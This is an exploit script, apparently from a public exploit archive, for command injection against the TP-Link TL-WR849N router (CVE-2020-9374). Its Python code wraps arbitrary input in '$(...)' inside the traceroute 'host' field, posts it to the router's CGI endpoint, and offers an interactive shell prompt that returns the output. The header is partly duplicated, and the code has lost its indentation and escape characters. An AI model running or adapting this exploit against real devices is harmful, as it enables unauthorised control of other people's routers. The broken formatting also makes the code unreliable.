# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://w # Exploit Title: TP LINK TL-WR849N - Remote Code Execution
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-2020-9374
import requests
def output(headers,cookies):
url = 'http://192.168.0.1/cgi?1'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3x0dx0a'
data += 'diagnosticsStatex0dx0a'
data += 'X_TP_HopSeqx0dx0a'
data += 'X_TP_Resultx0dx0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
saida = r.text
filtro = saida.replace(': Name or service not known','')
filtro = filtro.replace('[0,0,0,0,0,0]0','')
filtro = filtro.replace('diagnosticsState=','')
filtro = filtro.replace('X_TP_HopSeq=0','')
filtro = filtro.replace('X_TP_Result=','')
print(filtro[:-8])
def aceppt(headers,cookies):
url = 'http://192.168.0.1/cgi?7'
data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0x0dx0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
output(headers,cookies)
def inject(command,headers,cookies):
url = 'http://192.168.0.1/cgi?2'
data = ''
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8x0dx0a'
data += 'maxHopCount=20x0dx0a'
data += 'timeout=5x0dx0a'
data += 'numberOfTries=1x0dx0a'
data += 'host="$('+command+')"x0dx0a'
data += 'dataBlockSize=64x0dx0a'
data += 'X_TP_ConnName=ewan_pppoex0dx0a'
data += 'diagnosticsState=Requestedx0dx0a'
data += 'X_TP_HopSeq=0x0dx0a'
r = requests.post(url,data=data,headers=headers,cookies=cookies)
aceppt(headers,cookies)
def main():
cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
headers = {'Content-Type': 'text/plain',
'Referer': 'http://192.168.0.1/mainFrame.htm'}
while True:
command = input('$ ')
inject(command,headers,cookies)
main()